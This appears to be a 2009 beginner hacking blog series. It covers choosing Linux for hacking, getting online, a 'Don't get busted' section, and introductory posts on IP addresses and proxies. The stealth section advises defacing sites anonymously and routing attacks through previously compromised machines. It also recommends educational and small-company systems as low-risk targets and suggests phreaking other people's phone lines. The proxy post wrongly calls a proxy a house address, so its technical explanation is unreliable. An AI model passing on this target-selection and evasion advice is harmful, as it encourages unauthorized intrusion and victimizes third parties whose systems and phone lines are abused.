  Operating Systems
  ~~~~~~~~~~~~~~~~~


Ok, I assume you own a x86 box (this means an intel processor or compatible) running windoze9x,
or perhaps a mac (motorola) box running macOS.

You can't hack with that. In order to hack, you'll need one of those UNIX derived operating
systems.
This is for two main reasons:

-the internet is full of UNIX boxes (windoze NT boxes are really few) running webservers and
 so on. to hack one of them, you need a minimun knowledge of a UNIX system, and what's better
 than running it at home?

-all the good hacking tools and exploit codes are for UNIX. You won't be able to use them unless
 you're running some kind of it.

Let's see where to find the unix you're interested on.

The UNIX systems may be divided in two main groups:

 - commercial UNIXes
 - free opensource UNIXes

A commercial unix's price is not like windoze's price, and it usually can't run on your box,
so forget it.

The free opensource UNIXes can also be divided in:
 - BSD
  These are older and difficult to use. The most secure OS (openBSD) is in this group.
  You don't want them unless you're planning to install a server on them.

 - Linux
  Easy to use, stable, secure, and optimized for your kind of box. that's what we need.

I strongly suggest you to get the SuSE distribution of Linux.
 as i added here some tips for SuSE, so all should be easier.
 
Visit www.suse.de and look for a local store or order it online.
 (i know i said it the software was free, but not the CDs nor the manual nor the support.
  It is much cheaper than windoze anyway, and you are allowed to copy and distribute it)

If you own an intel box, then order the PC version.

If you own a mac box, then order the PowerPC version.

Whatever you do, DON'T PICK THE COREL DISTRIBUTION, it sucks.

It's possible you have problem with your hardware on the installation. Read the manual, ask
for technical support or buy new hardware, just install it as you can.

This is really important! READ THE MANUAL, or even buy a UNIX book.
Books about TCP/IP and C programming are also useful.

If you don't, you won't understand some things i'll explain later. And, of course, you'll
never become a hacker if you don't read a lot of that 'literature'.

 the Internet
  ~~~~~~~~~~~~


Yes! you wanted to hack, didn't you? do you want to hack your own box or what?
You want to hack internet boxes! So lets connect to the internet.

Yes, i know you've gotten this document from the internet, but that was with windoze
and it was much easier. Now you're another person, someone who screams for knowledge and wisdom.
You're a Linux user, and you gotta open your way to the Internet.

You gotta make your Linux box to connect to the net,
so go and set up your modem (using YaST2 in SuSE).

Common problems:

If your box doesn't detect any modems, that probably means that you have no modem installed
:-D (not a joke!).

Most PCI modems are NOT modems, but "winmodems". Winmodems, like all winhardware, are
specifically designed to work ONLY on windoze. Don't blame linux, this happens because the 
winmodem has not a critical chip that makes it work. It works on windoze cause the vendor
driver emulates that missing chip. And hat vendor driver is only available for windoze.


ISA and external modems are more probably real modems, but not all of them.
If you want to make sure wether a modem is or not a winmodem, visit http://start.at/modem.

Then use your modem to connect to your ISP and you're on the net. (on SuSE, with wvdial)

 Don't get busted
  ~~~~~~~~~~~~~~~~



Let's suppose you haven't skipped everything below and your Linux bow is now connected to the net.

It's now turn for the STEALTH. You won't get busted! just follow my advices and you'll be safe.

- Don't hack
  this is the most effective stealth technique. not even the FBI can bust you. :-)
  If you choose this option, stop reading now, cause the rest is worthless and futile.

- If you change a webpage, DON'T SIGN! not even with a fake name. they can trace you, find
  your own website oe email address, find your ISP, your phone number, your home...
  and you get busted!!

- be PARANOID, don't talk about hacking to anyone unless he is really interested in hacking too.
  NEVER tell others you've hacked a box.

- NEVER hack directly from your box (your_box --> victim's box).
  Always use a third box in the middle (your_box --> lame_box --> victim's box).

  Where lame_box is a previously hacked box or...a shell account box!
  A shell account is a service where you get control of a box WITHOUT hacking it.
  There are a few places where shell accounts are given for free. One of them is nether.net.
 
- Don't hack dangerous boxes until you're a real hacker.
  Which boxes are dangerous:
  Military boxes
  Government boxes
  Important and powerful companies' boxes
  Security companies' boxes
  Which boxes are NOT dangerous:
  Educational boxes (any .edu domain)
  Little companies' boxes
  Japanese boxes

- Always connect to the internet through a free and anonymous ISP
  (did i tell you that AOL is NOT an ISP?)

- Use phreking techniques to redirect calls and use others' lines for your ISP call.
  Then it'll be really difficult to trace you. This is not a guide to phreaking anyway.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ok i'll be posting rest of part very soon so don't forget to check out!

===================================================================

Discilamer:

These blog series are for educational purpose only. Please ask the person you wanna hack to before doing anything.

i'll not be responisible in any casse!!









Friday, May 15, 2009

Whats an ip adress


Surfing through internet i find this question to be most asked. So i thought why not to post a topic on it?

An Internet Protocol (IP) address is a numerical identification and logical address that is assigned to devices participating in a computer network utilizing the Internet Protocol for communication between its nodes.[1] Although IP addresses are stored as binary numbers, they are usually displayed in human-readable notations, such as 208.77.188.166 (for IPv4), and 2001:db8:0:1234:0:567:1:1 (for IPv6). The role of the IP address has been characterized as follows: "A name indicates what we seek. An address indicates where it is. A route indicates how to get there."[2]

The original designers of TCP/IP defined an IP address as a 32-bit number[1] and this system, now named Internet Protocol Version 4 (IPv4), is still in use today. However, due to the enormous growth of the Internet and the resulting depletion of the address space, a new addressing system (IPv6), using 128 bits for the address, was developed in 1995[3] and last standardized by RFC 2460 in 1998.[4]

The Internet Protocol also has the task of routing data packets between networks, and IP addresses specify the locations of the source and destination nodes in the topology of the routing system. For this purpose, some of the bits in an IP address are used to designate a subnetwork. The number of these bits is indicated in CIDR notation, appended to the IP address, e.g., 208.77.188.166/24.

With the development of private networks and the threat of IPv4 address exhaustion, a group of private address spaces was set aside by RFC 1918. These private addresses may be used by anyone on private networks. They are often used with network address translators to connect to the global public Internet.

The Internet Assigned Numbers Authority (IANA) manages the IP address space allocations globally. IANA works in cooperation with five Regional Internet Registries (RIRs) to allocate IP address blocks to Local Internet Registries (Internet service providers) and other entities.

So its clear that a proxy is nothing but a house address but used for computers.

===================================================================

Discilamer:

These blog series are for educational purpose only. Please ask the person you wanna hack to before doing anything.

i'll not be responisible in any casse!!



Surfing Thriough proxy

Introduction

Proxy may refer to one who or that which acts on behalf of someone or something else.

In computers it simply means that you ask a website to fetch you a page, but indirectly.

Use of proxy

Proxies are used around the world to surf anonymously. Whenever you visit a website they collect many personal information about you with the help of your ip adress, in order to avoid such a tresspasing people especially aware ones use proxy sites.

What do these sites do?

When you use a proxy server, it requests the website you intend to visit and get webpages for you hence saving you from losing your valuable information.

Types and functions

Proxy servers implement one or more of the following functions:

Caching proxy server

 caching proxy server accelerates service requests by retrieving content saved from a previous request made by the same client or even other clients. Caching proxies keep local copies of frequently requested resources, allowing large organizations to significantly reduce their upstream bandwidth usage and cost, while significantly increasing performance. Most ISPs and large businesses have a caching proxy. These machines are built to deliver superb file system performance (often with RAID and journaling) and also contain hot-rodded versions of TCP. Caching proxies were the first kind of proxy server.

The HTTP 1.0 and later protocols contain many types of headers for declaring static (cacheable) content and verifying content freshness with an original server, e.g. ETAG (validation tags), If-Modified-Since (date-based validation), Expiry (timeout-based invalidation), etc. Other protocols such as DNS support expiry only and contain no support for validation.

Some poorly-implemented caching proxies have had downsides (e.g., an inability to use user authentication). Some problems are described in RFC 3143 (Known HTTP Proxy/Caching Problems).

Another important use of the proxy server is to reduce the hardware cost. An organization may have many systems on the same network or under control of a single server, prohibiting the possibility of an individual connection to the Internet for each system. In such a case, the individual systems can be connected to one proxy server, and the proxy server connected to the main server.

Web proxy

A proxy that focuses on WWW traffic is called a "web proxy". The most common use of a web proxy is to serve as a web cache. Most proxy programs (e.g. Squid) provide a means to deny access to certain URLs in a blacklist, thus providing content filtering. This is usually used in a corporate environment, though with the increasing use of Linux in small businesses and homes, this function is no longer confined to large corporations. Some web proxies reformat web pages for a specific purpose or audience (e.g., cell phones and PDAs).

AOL dialup customers used to have their requests routed through an extensible proxy that 'thinned' or reduced the detail in JPEG pictures. This sped up performance but caused problems, either when more resolution was needed or when the thinning program produced incorrect results. This is why in the early days of the web many web pages would contain a link saying "AOL Users Click Here" to bypass the web proxy and to avoid the bugs in the thinning software.

List a few proxy servers

http://www.flyproxy.com my personal favorite!